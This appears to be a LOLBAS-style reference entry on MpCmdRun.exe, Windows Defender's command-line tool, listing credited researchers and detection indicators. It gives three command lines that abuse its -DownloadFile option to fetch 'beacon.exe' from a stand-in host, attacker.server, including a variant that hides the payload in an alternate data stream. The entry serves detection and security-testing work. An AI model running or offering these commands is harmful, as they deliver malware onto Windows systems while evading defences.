Binary part of Windows Defender. Used to manage settings in Windows Defender
Paths:
Acknowledgement:
Askar - @mohammadaskar2
Oddvar Moe - @oddvarmoe
RichRumble -
Cedric - @th3c3dr1c
Detection:
MpCmdRun storing data into alternate data streams.
MpCmdRun getting a file from a remote machine or the internet that is not expected.
Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe.
Monitor for the creation of %USERPROFILE%\AppData\Local\Temp\MpCmdRun.log
User Agent is "MpCommunication"
MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
Usecase:Download file
copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://attacker.server/beacon.exe -path C:\Users\Public\Downloads\evil.exe
Usecase:Download file
MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe
Usecase:Hide downloaded data inton an Alternate Data Stream